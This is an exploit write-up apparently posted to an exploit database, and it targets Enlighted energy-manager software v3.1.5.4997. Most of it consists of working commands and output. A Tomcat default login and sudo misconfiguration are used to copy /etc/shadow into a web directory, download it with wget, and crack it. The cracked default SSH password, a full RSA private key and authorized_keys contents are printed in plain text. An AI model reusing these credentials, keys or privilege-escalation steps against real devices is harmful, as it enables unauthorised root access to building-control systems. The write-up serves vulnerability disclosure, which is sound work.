Exploit Title: Enlighted v 3.1.5.4997

# Exploit Title: Enlighted v 3.1.5.4997
# Date: 10-02-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# Vendor Homepage: http://www.enlightedinc.com/
# Software Link: http://www.enlightedinc.com/system-and-solutions/iot-system/energy-manager/
# Version: ?~<v 3.1.5.4997 through ?
# Tested on: v 3.1.5.4997
# CVE : N/A

TODO: Improve Writeup

Enlighted v 3.1.5.4997

Default tomcat manager credential

Command: sudo -l Matching Defaults entries for tomcat6 on this host:
env_reset

User tomcat6 may run the following commands on this host:
(root) NOPASSWD: /bin/cp, (root) /bin/ls, (root) /bin/tar,
(root) /usr/bin/dpkg, (root) /usr/bin/tee, (root) /usr/sbin/dpkg-reconfigure,
(root) /etc/init.d/networking, (root) /bin/date, (root) /etc/init.d/tomcat6,
(root) /etc/init.d/dhcp3-server, (root) /sbin/ifup, (root) /sbin/ifdown,
(root) /usr/bin/killall

Using the ability to cp and tar with sudo I made a tar bundle of the /etc/shadow file without preserving permissions that could be read as tomcat6.
sudo cp /etc/shadow ./webapps/cmd/
sudo tar cf ./webapps/cmd/shadow.tar --mode=a+rwX ./webapps/cmd/shadow

I downloaded the shadow file to crack offline.

The hash is sha512crypt which isn’t a hash type I get great cracking speeds on so it took a few minutes.

wget https://x.x.x.x/cmd/shadow.tar

I didn't do any targeted cracking and let it run for a while using crackstation-human-only.txt :https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

$6$D9BfPiuR$jhbcZkSn/c2F1LXZiicP7.LCUsDosNX.XCEPWP8Fdq54ewdTZFHS7uBMjqzvnz9ek2tG.Wd7nzDmDz3ZyWRWX.:save-energy

ssh enlighted@x.x.x.x
password:save-energy

--

ssh enlighted@x.x.x.x
enlighted@x.x.x.x's password:
Linux enlightedinc-448a5b3a6276 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Ubuntu 10.04.1 LTS
Welcome to Ubuntu!

* Documentation: https://help.ubuntu.com/

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

--
I had also downloaded the .ssh/id_rsa_openssh private key from the enlighted user’s home directory via the tomcat6 user as they were world readable but it doesn’t seem to match the authorized host file for the user.

Command: ls -la /home/enlighted/.ssh

total 16

drwxr-xr-x 2 enlighted enlighted 4096 2014-05-07 01:13 .;
drwxr-xr-x 31 enlighted enlighted 4096 2014-08-16 02:59 ..;
-rw-r--r-- 1 enlighted enlighted 604 2014-05-05 22:03 authorized_keys
-rwxr-xr-x 1 enlighted enlighted 899 2014-05-05 22:03 id_rsa_openssh

Command: cat /home/enlighted/.ssh/id_rsa_openssh

-----BEGIN RSA PRIVATE KEY-----
MIICZAIBAAKBgnbxkbinvHx6iNbN1mpnE+z7kNOdF4aMUWYuMhND/3n0+7t5e9ed cBmMIR9jB8YfRE36/6CFn8qnSEbYuii6g2MFg3wEUscNPI0RWLzGVz2xV6T90k5V KQp8+V0+VJpIeNp3VZexdIPkQ62Oq2Ex8bXofML5KF/3LLMoBiveSdvzOJsCAwEA AQKBggMjFu1QWzvLPY2wyx1uT4u6DNVP+N1fGQyBXme8rOHKENOefiIvMFQ0KnF5 +qwCihomaxSQQakmJVVdBPfrB2kWpGJRl7cFp7vQkbZrPLlDjsUB6cG0Q7fiEsBo 1XxyiomRHOrs5ONItkDF0STPt2QnlV4dWaWhrHMDeTYniJ1HiBUCQgDBvt5UX9kI F9MZj81756yGdSssnoF/8ejWYxAjPqfyYIW+2NZMNVul2zbjc+DM7fgYg5c2rWvA uwhUCdfvoI6+/QJCAJ0po5UCXQtKBo4eGE7bpGVITqVyghDlXXdAcZiepAIN4O3m WqE1V0q8opYlBnf2E9wJEdq+a2tGaK2rufbhi4V3AkIAtBEfNa/3WEw8SK+cPSJu +HCBdfDDTxSYYFilsPwUv3HyHBQP57hXu2hoNTGHpy8svCvhKFI5qWCrNuAHL5E7 2kkCQUIvOdtTnnlVmEMbO2NiLe4VMEGOYmXZIa5Jrkz2ad0PmSy2eG4xN2ya2eFf AEVelOhxzVoQHM6VXRneGrd0LjxrAkFGTNF+j8VfULvWPwVlBupbA0Sj6377C8NM YUtQvVpV+8nTvA3JAHDgV/m0MccGqD/fnPcBDqDfOVd5vgW+lZbRrw==
-----END RSA PRIVATE KEY-----

Command: cat /home/enlighted/.ssh/authorized_keys

ssh-dss AAAAB3NzaC1kc3MAAACBAIDsF5vgyLHkpagPXaF3JZDofmPTlfpKLJRb6DA8bZ+FqFbIM6jGqDgCVCuLwqkjmgMuNvj3IMCJiAfC3+3LgRCb4q8xsEeOFPqUUoSwEqnrXIzCysfqFq6KuxdZnPPCCOBooHAjzxLgImfjDGoPxWkjPh6TDis0ibcaGmmA+pXJAAAAFQDB0ZBfuqpYYQtiWQ1LIMDIh53DqQAAAIAN4IobfedQTGaNwp4eJlm4z3Jd00blQ3HGn4JVYhdH4X/p2cz5YYDMaczAUgaMcAkLaF3887ZMP9tH5pRe2GKM948dsInwYclC7GZPVbuc3IZ9DQCEm9vzgMyCgqkmw1QJOvoWcSzlZXgvP1UGmkKgB2rCk90ePCCvHw+huZn/wQAAAIAUG8qm71Ic7dqxR+v7Mw5BlWiI/QqOjbckllMwjbb4PQAciPBOjmM8qXjyxqQs0fd7swXDZ3uYjyL3xqRLb70RI+bc9Ydg0opoKPMGLYn7TB2rG7Ecn9RdVYZBUwn5MVu2pf5YYQyNtpKyFWrqNlqamln6x6hrFoz6QREbe4hN2Q== root@enlighted cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=10.04 DISTRIB_CODENAME=lucid DISTRIB_DESCRIPTION="Ubuntu 10.04.1 LTS" uname -a Linux enlightedinc-448a5b3a6276 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Timeline:

04-20-2015: Discovered default tomcat manager credentials - The vendor was unwilling to assist in remediation.
* Multiple un-documented assistance requests
* 09-28-2016: Re-contacted the vendor for assistance to change the credentials and the vendor declined assistance without paying for service.
* 09-28-2016: Discovered insecure sudo configurations for tomcat6 user used webshell to download /etc/shadow
* 10-01-2016: Default account enlighted credential cracked allowing remote ssh + root Vendor not currently notified